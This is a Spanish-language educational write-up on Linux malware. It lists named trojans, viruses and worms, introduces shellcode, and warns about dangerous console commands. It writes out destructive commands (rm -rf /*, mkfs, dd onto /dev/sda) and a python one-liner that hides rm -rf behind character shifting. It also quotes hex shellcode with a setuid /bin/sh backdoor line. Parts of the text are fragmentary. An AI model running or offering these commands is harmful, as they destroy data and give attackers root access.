Professional Documents
Culture Documents
Troyanos:
Kaiten Linux.Backdoor.Kaiten trojan horse
Rexob Linux.Backdoor.Rexob trojan
Virus:
Alaeda Virus.Linux.Alaeda
Bad Bunny Perl.Badbunny
Binom Linux/Binom
Bliss
Brundle
Bukowski
Diesel Virus.Linux.Diesel.962
Kagob a Virus.Linux.Kagob.a
Kagob b Virus.Linux.Kagob.b
MetaPHOR (also known as Simile)
Nuxbee Virus.Linux.Nuxbee.1403
OSF.8759
Podloso Linux.Podloso (The iPod virus)
Rike Virus.Linux.Rike.1627
RST Virus.Linux.RST.a
Satyr Virus.Linux.Satyr.a
Staog
Vit Virus.Linux.Vit.4096
Winter Virus.Linux.Winter.341
Winux (also known as Lindose and PEElf
ZipWorm Virus.Linux.ZipWorm
Gusanos:
Adm Net-Worm.Linux.Adm
Adore
Cheese Net-Worm.Linux.Cheese
Devnull
Kork
Linux/Lion (also known as Ramen)
Mighty Net-Worm.Linux.Mighty
Millen Linux.Millen.Worm
Slapper
SSH Bruteforce
Y desactivo el acceso:
Entrando en la Shellcode
Tal y como podemos deducir por su nombre, una Shellcode es un cdigo
que nos va a devolver una ventana de comandos. Generalmente son cdigos
cortos, ya que se tienen que introducir en la memria de la pila.
Escribir una shellcode en C. Esta es la ms bsica y la ms conocida:
Observando la lnea del execve, vemos que es una funcin que llama al
sistema para ejecutar un programa. Nos la jugamos y ejecutamos:
root@kali:~/Desktop ./give_me_shell
# vi f_ck.sh
rm -rf /*
mkfs
mkfs.ext3
mkfs.cualquier_cosa
mkfs (crea un sistema de ficheros). Reformatea lo que viene despus del
comando creando en su lugar un sistema de ficheros nuevo y limpio.
cualquier_comando > /dev/sda
dd if=algo of=/dev/sda
Esto escribe informacin en un dispositivo directamente ignorando el
sistema de ficheros, que probablemente acabar corrompindose.
Una bomba fork que satura la tabla de procesos del sistema, fcilmente
evitable.
Ficheros comprimidos que cuando se descomprimen te inundan el sistema
de archivos, te dejan sin espacio en el disco, o te sobrescriben ficheros.
Scripts o programas creados por gente malvada, hay que leer el cdigo
fuente de cualquier cosa descargada de una fuente no fiable o cruzar los
dedos y encomendarse a Dios mientras se ejecuta (la efectividad de este
mtodo no est probada). Como ejemplo, el mensaje en una lista de correo
que ofreca un programilla en C para aprovecharse de un exploit del
comando sudo, veamos la parte interesante del mismo:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68"
"xffxffxffxffx68xdfxd0xdfxd9x68x8dx99"
"xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7"
"x56x04xf7x56x08xf7x56x0cx83xc4x74x56"
"x8dx73x08x56x53x54x59xb0x0bxcdx80x31"
"xc0x40xebxf9xe8xbdxffxffxffx2fx62x69"
"x6ex2fx73x68x00x2dx63x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
Esto trozo de cdigo hexadecimal ejecuta un rm -rf ~ / &, borraremos
nuestro home y si somos root todo el disco.
Hay que tener cuidado en especial al tocar otros comandos como
chmod, chown y chgrp que alteran los permisos, propietario y grupo de los
ficheros ya que podramos conceder acceso a cualquiera o dejar el sistema
hecho un desastre si se aplican de forma recursiva sin control.
Tambin recordar que todos estos comandos se pueden ejecutar mediante
scripts en lenguajes como python, por ejemplo este cdigo:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
Ejecuta un rm -rf * oculto tras el sn!.sg!+.
Despus de esta investigacin, ahora sabemos que Linux no es un sistema
100% seguro y que su consola tiene un gran poder a la hora de ejecutar
GLOSARIO:
1. SCAREWARE abarca varias clases de software para estafar con
cargas maliciosas
2. SPYWARE programa espa es un software que recopila informacin
de un ordenador y despus transmite esta informacin a una entidad
externa
3. CRIMEWARE es una clase de software malicioso diseado
especficamente para automatizar el delito ciberntico.
WEBGRAFIA:
www.wikipedia.com
www.taringa.net
http://sinconexion.net/linux